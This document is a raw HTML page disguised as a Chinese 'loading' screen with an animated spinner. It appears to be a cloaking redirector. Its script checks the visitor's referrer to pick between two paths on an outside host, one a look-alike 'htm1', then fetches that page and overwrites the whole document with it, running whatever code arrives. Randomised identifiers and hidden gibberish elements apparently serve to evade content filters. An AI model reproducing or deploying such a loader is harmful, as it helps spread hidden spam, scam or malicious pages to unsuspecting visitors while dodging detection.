<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .lRDsVtH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .lRDsVtH .HrUBk0FqMZU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .lRDsVtH .content {
            line-height: 50px;
            text-align: center
        }

        .lRDsVtH .img {
            width: 100%
        }

        .lRDsVtH .UwWxq0D73b1 {
            text-align: center
        }

        .lRDsVtH .UwWxq0D73b1 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .lRDsVtH .UwWxq0D73b1 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .lRDsVtH .UwWxq0D73b1 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .lRDsVtH .UwWxq0D73b1 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .lRDsVtH .UwWxq0D73b1 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .lRDsVtH .UwWxq0D73b1 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .lRDsVtH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YdcJ4LvPX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gkaQ6 = YdcJ4LvPX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gkaQ6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gkaQ6 +".html?a=share";
		}
		
        h28GWSG=url+"#"+new Date().getTime();
        h28GWSG && function() {
            $.get(h28GWSG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>Vrvv1YSA6AgadwZNHmNrdIEF9mJYZffRdq240wzghfjn72Vzk1cmxwX88GkAweOgTRDCIgJ3FJW6xZWsNDebcEzyJuGjqFXnqSl</p>
<a  href='#' style='display:none'>n2CQyYVNsiL5cTSN7TT93TKFrsaeNzCt9igtPkkQF5BJIhDHOfPZ3WMHy5dVu9JaRUk4jpZdxb3SXZwaL</a>
<span style='display:none'>UqYJCssrlZUmP7LuGqIwkfkRanAvEnWUB</span>
<p  style='display:none'>Vrvv1YSA6AgadwZNHmNrdIEF9mJYZffRdq240wzghfjn72Vzk1cmxwX88GkAweOgTRDCIgJ3FJW6xZWsNDebcEzyJuGjqFXnqSl</p>
<a  href='#' style='display:none'>n2CQyYVNsiL5cTSN7TT93TKFrsaeNzCt9igtPkkQF5BJIhDHOfPZ3WMHy5dVu9JaRUk4jpZdxb3SXZwaL</a>
<ul style='display:none' >XWQsG1eKpyRq8fAEymHarZ6M2oPMCH</ul><div class="lRDsVtH">
    <div class="HrUBk0FqMZU">
        <div class="UwWxq0D73b1">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >cgDFcqM2g1mAT9mFtl0a0aMb5HEq9Erd7zQqrAcoxQUwQ2A2m4jXdAPVBKewT5aPk0vgQX0MYJGI7</li>
<img  src='' style='display:none'>
<b style='display:none' >h4xRHtgnyRw5vngSOIh1KV8PiZSjVFC458g1e5BcPlPgnkQVg6GfSCRYVva693oCX6yDY0EeBs8x2khof8</b>
<h1 style='display:none' >NmiS7tYGTxiVZ</h1>
<b style='display:none' >h4xRHtgnyRw5vngSOIh1KV8PiZSjVFC458g1e5BcPlPgnkQVg6GfSCRYVva693oCX6yDY0EeBs8x2khof8</b></body>
</html>